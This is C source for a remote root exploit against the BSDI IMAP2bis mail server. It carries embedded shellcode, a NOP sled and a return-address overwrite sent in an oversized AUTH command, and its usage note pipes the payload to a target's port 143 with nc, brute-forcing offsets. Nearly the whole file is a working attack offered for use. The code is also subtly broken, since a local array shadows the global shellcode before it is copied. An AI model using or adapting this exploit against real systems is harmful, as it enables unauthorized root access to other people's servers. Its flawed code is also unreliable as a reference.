/* BSDI IMAP2BIS remote root exploit Usage: (./imapx <offset>;cat)| nc targethost 143 where offset = -1000..1000 (brute force if 0 doesnt work) Note: if you plan to port this to other OS., make sure the shellcode doesn't contain lower case chars since imapd will toupper() the shellcode, thus fucking it up. Note: I tested this on a few system's and found this offsets vulnerable */ #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #define BUFLEN 4092 #define NOP 0x90 char shell[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "\x42\x49\x4e\x2f\x53\x48\x00"; void main (int argc, char *argv[]) { char buf[BUFLEN]; int offset,nop,i; unsigned long esp; char shell[1024+300]; fprintf(stderr,"usage: %s <offset>\n", argv[0]); nop = 403; esp = 0xefbfd5e8; offset = atoi(argv[1]); memset(buf, NOP, BUFLEN); memcpy(buf+(long)nop, shell, strlen(shell)); for (i = 1024; i < BUFLEN - 3; i += 2) { *((int *) &buf[i]) = esp + (long) offset; shell[ sizeof(shell)-1 ] = 0; } printf("{%d} AUTH\r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; }